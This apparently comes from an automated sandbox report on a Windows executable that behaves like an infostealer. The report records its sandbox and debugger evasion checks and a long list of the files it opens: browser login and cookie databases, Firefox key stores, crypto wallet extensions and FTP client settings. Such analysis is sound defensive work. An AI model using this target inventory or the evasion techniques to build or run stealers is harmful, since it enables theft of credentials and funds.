          Source: 12Kp1xbcjv.exeStatic file information: File size 1309696 > 1048576
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name: entropy: 7.998160113640175
          Source: 12Kp1xbcjv.exeStatic PE information: section name: entropy: 7.935140609630221
          Source: 12Kp1xbcjv.exeStatic PE information: section name: entropy: 7.969032328920971
          Source: 12Kp1xbcjv.exeStatic PE information: section name: entropy: 7.9069134409741055
          Source: 12Kp1xbcjv.exeStatic PE information: section name: .data entropy: 7.986435342889377
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeWindow / User API: threadDelayed 819Jump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exe TID: 7388Thread sleep count: 819 > 30Jump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exe TID: 7408Thread sleep time: -210000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000D8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1344927950.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1344875358.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1150120587.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343875916.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344347424.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000D8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000D8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1344927950.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294232377.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343875916.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280817363.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280817363.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280817363.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280565524.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3pnbbkehpmmoabgpc
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1209607996.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280817363.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1265843707.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1265843707.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%ap/
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
